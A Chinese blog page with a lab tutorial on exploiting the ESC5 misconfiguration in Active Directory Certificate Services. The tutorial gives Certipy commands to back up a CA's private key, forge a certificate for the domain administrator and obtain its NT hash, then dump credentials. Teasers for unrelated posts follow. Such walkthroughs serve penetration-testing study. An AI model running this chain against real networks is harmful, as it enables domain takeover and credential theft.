news 2026/4/16 17:47:44

深入解析ESC5 ADCS配置漏洞利用——活动目录渗透测试实战

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
深入解析ESC5 ADCS配置漏洞利用——活动目录渗透测试实战

摘要

继我之前写的ESC4文章之后——现在我的工作完成了,终于有更多时间学习,我想我也要深入研究一下ESC5。说实话,我不知道为什么,但学习活动目录(Active Directory)利用感觉起来更令人兴奋,尽管在印度尼西亚的真实环境中仍然相当罕见。可能只是我理想主义的一面吧,哈哈哈。好了,让我们开始一起学习吧。

什么是ESC5

ESC5是一种针对活动目录证书服务(ADCS)的攻击。这种攻击利用了对证书颁发机构(CA)的访问权限。如果攻击者获得了CA服务器上的本地管理员权限,就可以提取CA证书及其私钥。利用该私钥,攻击者可以为特权账户(如域管理员)伪造恶意证书。然后,这些伪造的证书可用于通过PKINIT向AD进行身份验证并请求TGT(票据授予票据)。

搭建实验室

创建一个任意名称的账户,并将该账户添加为CA服务器(DC01)上的本地管理员:

net localgroup Administrators"igniteraj"/add net localgroup Administrators

(按回车或点击查看完整大小的图片)

枚举与利用

使用Certipy在CA服务器上以本地管理员账户枚举证书。
(按回车或点击查看完整大小的图片)
(按回车或点击查看完整大小的图片)

使用Certipy备份CA证书和私钥。

certipy ca -backup -u alex.doe@sandbox.local -p"MyPassword123"-ca ignite-DC-CA -target10.100.150.10

伪造我们想要接管的账户——在本例中是administrator@sandbox.local,因为它是我的目标上的域管理员。

certipy forge -ca-pfx'sandbox-ca.pfx'-upn administrator@sandbox.local

使用Certipy获取administrator@sandbox.local账户的NT哈希。

certipy auth -pfx administrator_forged.pfx -dc-ip10.100.150.10

(按回车或点击查看完整大小的图片)
(按回车或点击查看完整大小的图片)

使用SecretDump导出哈希凭据。
(按回车或点击查看完整大小的图片)

参考资料

  • https://www.hackingarticles.in/ad-cs-esc5-vulnerable-pki-object-access-control/
  • https://mayfly277.github.io/posts/ADCS-part14/
  • https://www.vaadata.com/blog/ad-cs-security-understanding-and-exploiting-esc-techniques/
    CSD0tFqvECLokhw9aBeRqixLzx0482UkkKWM4rJX2T+9qXDLcUYQal3W1ykfQ9si0pulG6s9/0h/hW8d28k1SsX8sObhJabP00Qx1uju62JSdqgDv8XWiIQ1stSnFOlB/q2Fi82D6F6LlOrFptzcOg==
    更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
    对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/16 12:25:20

曙光屋sgwbox N3曝命令注入漏洞CVE-2025-14705,攻击者可远程利用

CVE-2025-14705: 曙光屋 sgwbox N3 中的命令注入漏洞 严重等级: 严重 类型: 漏洞 CVE ID: CVE-2025-14705 描述 在曙光屋 sgwbox N3 2.0.25 版本中发现一个漏洞。此漏洞影响了组件 SHARESERVER 功能的某个未知函数。对参数 params 的操控导致了命令注入。攻击可以远程发起。该漏…

作者头像 李华
网站建设 2026/4/16 12:13:11

Thread类的基本用法

1.线程创建 见上篇博客https://blog.csdn.net/weixin_69059394/article/details/155943050?fromshareblogdetail&sharetypeblogdetail&sharerId155943050&sharereferPC&sharesourceweixin_69059394&sharefromfrom_link 2.是否是守护线程/设置守护线程 …

作者头像 李华
网站建设 2026/4/16 15:24:11

软件测试工程师linux学习之系统层面相关命令总结

1 linux系统重启和关机的命令 重启命令:reboot 关机命令:shutdown 这两个命令一般很少用到,我们了解即可。 2 查看日志信息命令 什么是日志,日志就是一个一个普通的文本文件,文件里面记录的是软件运行过程中的信息…

作者头像 李华
网站建设 2026/4/16 12:15:21

火山引擎AI大模型接入vLLM,吞吐量提升8倍

火山引擎AI大模型接入vLLM,吞吐量提升8倍 在今天的企业级AI应用战场中,一个核心指标正在决定服务成败——不是模型参数多大,也不是训练精度多高,而是每秒能处理多少用户请求。当大语言模型从实验室走向客服、教育、金融等真实业务…

作者头像 李华
网站建设 2026/4/16 7:29:30

ESD整改:从失效分析到量产保障的技术实战

一、ESD整改介绍 ESD(Electrostatic Discharge,静电放电)整改是指针对电子设备在静电放电抗扰度测试(依据IEC 61000-4-2标准)中出现的功能异常或硬件损伤,通过系统性分析与工程措施使其满足8kV(…

作者头像 李华
网站建设 2026/4/16 7:20:38

集之互动AI商业视频:用一支好片讲清产品价值

在品牌争夺用户注意力和信任的时代,如何用更低的成本、更短的周期,把产品卖点和品牌故事讲清楚、讲出记忆点,已经成为许多企业共同的命题。AIGC视频制作服务商集之互动推出 AI 商业视频制作服务,通过大模型驱动的信息拆解与可视化…

作者头像 李华